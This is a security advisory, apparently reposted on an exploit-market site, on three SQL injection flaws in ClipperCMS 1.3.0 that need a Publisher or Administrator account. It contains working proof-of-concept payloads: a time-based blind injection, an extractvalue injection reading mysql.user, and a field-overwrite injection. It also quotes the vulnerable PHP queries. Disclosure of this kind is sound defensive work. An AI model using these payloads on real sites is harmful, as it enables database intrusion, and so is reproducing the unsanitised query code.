[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ClipperCMS 1.3.0 - Multiple SQL Injection Vulnerabilities

Author
Curesec
Risk
[
Security Risk High
]
0day-ID
0day-ID-24565
Category
web applications
Date add
17-11-2015
Platform
php
1. Introduction
 
Affected Product:    ClipperCMS 1.3.0
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://www.clippercms.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 11/13/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH
 
2. Overview
 
There are multiple SQL Injection vulnerabilities in ClipperCMS 1.3.0.
 
An account with the role "Publisher" or "Administrator" is needed to exploit
each of these vulnerabilities.
 
3. SQL Injection 1 (Blind)
 
CVSS
 
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
 
Description
 
The id parameter of the web user editor is vulnerable to blind SQL Injection.
 
To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.
 
Proof of Concept
 
 
http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23
-> true
 
http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23
-> false
 
Code
 
 
/manager/actions/mutate_web_user.dynamic.php
$sql = "SELECT * FROM $dbase.`".$table_prefix."web_groups` where webuser=".$_GET['id']."";
 
4. SQL Injection 2
 
CVSS
 
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
 
Description
 
When updating a user, the newusername parameter is vulnerable to SQL injection.
 
To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.
 
Proof of Concept
 
 
POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest
&newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM mysql.user limit 0,1))) -- -
&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo3%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=&gender=&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query
 
Code
 
 
/manager/processors/save_user_processor.php
$sql = "UPDATE " . $modx->getFullTableName('manager_users') . "
SET username='$newusername'" . $updatepasswordsql . "
WHERE id=$id";
 
5. SQL Injection 3
 
CVSS
 
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
 
Description
 
When updating a user, the country, role, blocked, blockeduntil, blockedafter,
failedlogincount, and gender parameter are vulnerable to SQL injection.
 
To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.
 
Proof of Concept
 
The proof of concepts for the country, role, blocked, blockeduntil,
failedlogincount, and blockedafter parameter are analog to this POC for gender:
 
 
POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest&newusername=testtest&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo6%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=
&gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0
&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query
 
Visiting the overview page of that user will show the result of the injected
query.
 
Code
 
 
/manager/processors/save_user_processor.php
$sql = "UPDATE " . $modx->getFullTableName('user_attributes') . "
SET fullname='$fullname', role='$roleid', email='$email', phone='$phone',
mobilephone='$mobilephone', fax='$fax', zip='$zip', state='$state',
country='$country', gender='$gender', dob='$dob', photo='$photo', comment='$comment',
failedlogincount='$failedlogincount', blocked=$blocked, blockeduntil=$blockeduntil,
blockedafter=$blockedafter
WHERE internalKey=$id";
 
6. Solution
 
This issue has not been fixed by the vendor.
 
7. Report Timeline
 
10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public

#  0day.today [2024-12-26]  #